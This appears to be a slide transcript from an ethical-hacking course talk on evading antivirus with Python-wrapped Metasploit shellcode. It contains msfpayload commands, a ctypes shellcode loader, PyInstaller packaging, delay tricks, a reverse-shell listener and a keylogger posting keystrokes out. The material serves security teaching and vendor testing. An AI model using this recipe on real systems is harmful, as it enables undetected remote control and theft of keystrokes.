Violent Python

Violent Python


Violent Python

Transcript of Violent Python

Violent Python and the AV Scam

Violent PythonBio

CNIT 124Advanced Ethical Hacking

Violent PythonGood coding principlesException handlingModular designOptimizationCommentingFlow chartsFORGET THEM ALLViolent PythonWe are hackersWe are here to BREAK STUFFIt should be fast and easy for a complete novice to hack together a simple script to do something fun!



Ungh! Good God y'all...

What is it GOOD For?

Mikko Hypponen Video

Metasploit PayloadsMetasploitHundreds of payloadsThe simplest one: bind_tcpListens on a TCP port for commands

Simple Reverse ShellOne command to produce very simple Windows EXE malware

Antivirus Catches It

Norton v. Shell.exe

Norton Identifies the Metasploit Packer

VirusTotal: 37/49 Detections

How to Become 007

Python v. AVRound 1shell_bind_tcpExport Metasploit Payloads to C

Use Ctypes Python Library

Compile it on WindowsInstall these things, in orderPython 2.7PyWin32pip-WinPyInstallerThis creates an EXE file that listens on a TCP port

DEMOOn Kalimsfpayload windows/shell_bind_tcp C > foonano fooChange top tofrom ctypes import *shellcode = (Change bottom to);memorywithshell = create_string_buffer(shellcode, len(shellcode))shell = cast(memorywithshell, CFUNCTYPE(c_void_p))shell()DEMOOn Windows, in pip-Win:venv -c -i pyi-env-namepyinstaller --onefile --noconsole fooVirusTotal: 1/50 Detection

Norton SupportI Tweeted about this, and @NortonSupport repliedVirusTotal is not a fair test, because real installed Norton uses Heuristic Scanning@NortonSupport gave me a link for a 30-day trial version :)Norton Wins!

Kaspersky Wins!Avast! doesn't detect itKaspersky detects it as HEUR:Trojan.Win32.Generic

Python v. AVRound 2shell_bind_tcpwith a delay

DEMOOn Kalicp foo foo2nano foo2x=raw_input("Press Enter to continue")On Windows, in pip-Win:venv -c -i pyi-env-namepyinstaller --onefile foo2Norton, Avast, & MSE Lose!

Kaspersky Wins!

Python v. AVRound 3shell_bind_tcpin two stagesno delayOther AVTested on Mar 24, 2014 with a two-stage reverse shell and no time delayAl these failedNortonNod32Avast!360 Internet SecurityMcAfeeKasperskyRemember Mikko?

F-Secure Wins!

AV ChallengePosted April 3, 2014No reply from AV vendors, but Norton improved its detection after thatNow a delay is required

Python v. AVRound 4shell_bind_tcpwith a delayINSTRUCTIONSOn Kalimsfpayload windows/shell_reverse_tcp LHOST= C > revnano revChange top tox=raw_input("Press Enter to continue")from ctypes import *shellcode = (Change bottom to);memorywithshell = create_string_buffer(shellcode, len(shellcode))shell = cast(memorywithshell, CFUNCTYPE(c_void_p))shell()INSTRUCTIONSOn Windows, in pip-Win:venv -c -i pyi-env-namepyinstaller --onefile revOn Kalinc lp 4444

Norton Loses

Kaspersky Wins

Advanced Malware Protectionty @ChrisAbdalla_1 from HP ESP TippingPoint

A friend in the financial industry tested Evil.exe on a system protected by FireEyeFireEye gives no alerts and lets it post keystrokes right to Pastebin

Python KeyloggerGoogle "Python Keylogger"I used this one from 4 years ago

Post Keystrokes to Pastebin

ProblemPastebin busted me for making too many pastes in a 24-hour periodSo I wrote my own Pastebin imitationKaspersky & Avast! LOSE

Norton WINS!

But just add a delay...

F-Secure LOSES!


UNSTOPPABLENone of these products stop itNortonMcAfeeKasperskyNod32F-SecureAvast!Microsoft Security Essentials